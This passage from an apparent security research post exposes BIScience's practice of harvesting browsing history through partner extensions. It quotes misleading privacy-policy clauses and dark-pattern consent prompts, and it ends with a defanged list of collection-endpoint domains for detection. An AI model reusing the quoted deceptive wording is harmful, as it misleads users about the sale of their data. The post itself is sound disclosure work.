A block diagram titled “This feature, whatever it may be, should justify to Google Play or Google Chrome, why you are looking for access into users url visits information.” The scheme starts with a circle labeled “Get access to user’s browsing activity.” An arrow points towards a rectangle labeled “Send all URLs, visited by user, to your backend.” An arrow points to a rhombus labeled “Does the particular URL meets some criteria?” An asterisk in the rhombus points towards a text passage: “The criteria could fall under any of your preferences: -did you list the URL as malware? -is the URL a shopping website? -does the URL contain sensitive data? -is the URL travel related? etc.” An arrow labeled “No” points to a rectangle labeled “Do nothing; just store the URL and meta data.” An arrow labeled “Yes” points to a rectangle labeled “Store URL and meta data; provide related user functionality.” Both the original question and yes/no paths are contained within a larger box labeled “User functionality” but then have arrows pointing to another rectangle outside that box labeled “Send the data to Biscience endpoint.”

Notice how the graphic shows raw URLs are sent to BIScience regardless of whether the URL is needed to provide the user functionality, such as safe browsing protection. The step of sending data to BIScience is explicitly outside and separate from the user functionality.

Misleading privacy policy disclosures

BIScience’s integration guide suggests changes to an extension’s privacy policy in an attempt to comply with laws and Chrome Web Store policies, such as:

Company does not sell or rent your personal data to any third parties. We do, however, need to share your personal data to run our everyday business. We share your personal data with our affiliates and third-party service providers for everyday business purposes, including to:

  • Detect and suggest to close malware websites;
  • Analytics and Traffic Intelligence

This and other suggested clauses contradict each other or are misleading to users.

Quick fact check:

  • Extension doesn’t sell your personal data: False, the main purpose of the integration with BIScience is to sell browsing history data.
  • Extension needs to share your personal data: False, this is not necessary for everyday business. Much less for veiled reasons such as malware protection or analytics.

An astute reader may also notice BIScience considers browsing history data as personal data, given these clauses are meant to disclose transfer of browsing history to BIScience.

Misleading user consent

BIScience’s contracts with partners require opt-in consent for browsing history collection, but in practice these consents are misleading at best. Each partner must write their own consent prompt, which is not provided by BIScience in the SDK or documentation.

As an example, the extension Visual Effects for Google Meet integrated the BIScience safe browsing SDK to develop a new “feature” that collects browsing history:

Screenshot of a pop-up titled “Visual Effects is now offering Safe-Meeting.” The text says: “To allow us to enable integrated anti-mining and malicious site protection for the pages you visit please click agree to allow us access to your visited websites. Any and all data collected will be strictly anonymous.” Below it a prominent button with the label “Agree” and a much smaller link labeled “Disagree.”

We identified other instances of consent prompts that are even more misleading, such as a vague “To continue using our extension, please allow web history access” within the main product interface. This was only used to obtain consent for the BIScience integration and had no other purpose.

Our hope for the future

When you read the Chrome Web Store privacy disclosures on every extension listing, you might be inclined to believe the extension isn’t selling your browsing history to a third party. Unfortunately, Chrome Web Store allows this if extensions pretend they are collecting “anonymized” browsing history for “legitimate” purposes.

Our hope is that Chrome Web Store closes these loopholes and enforces stricter parts of the existing Limited Use and Single Purpose policies. This would align with the Chrome Web Store principles of Be Safe, Be Honest, and Be Useful.

If they don’t close these loopholes, we want CWS to clarify existing privacy disclosures shown to all users in extension listings. These disclosures are currently insufficient to communicate that user data is being sold under these exceptions.

Browser extension users deserve better privacy and transparency.

Related reading

If you want to learn more about browser extensions collecting your browsing history for profit:

IOCs

The Secure Annex blog post publicly disclosed many domains related to BIScience. We have observed additional domains over the years, and have included all the domains below.

We have chosen not to disclose some domains used in custom integrations to protect our sources and ongoing research.

Collection endpoints seen in third-party extensions:

  • sclpfybn[.]com
  • tnagofsg[.]com

Collection endpoints seen in BIScience-owned extensions and software:

  • urban-vpn[.]com
  • ducunt[.]com
  • adclarity[.]com

Third-party extensions which have disclosed in their privacy policies that they share raw browsing history with BIScience (credit to Wladimir Palant for identifying these):

  • sandvpn[.]com
  • getsugar[.]io

Collection endpoints seen in online data, software unknown but likely in third-party software:

  • cykmyk[.]com
  • fenctv[.]com

Collection endpoint in third-party software, identified in 2019 DataSpii research:

  • pnldsk[.]adclarity[.]com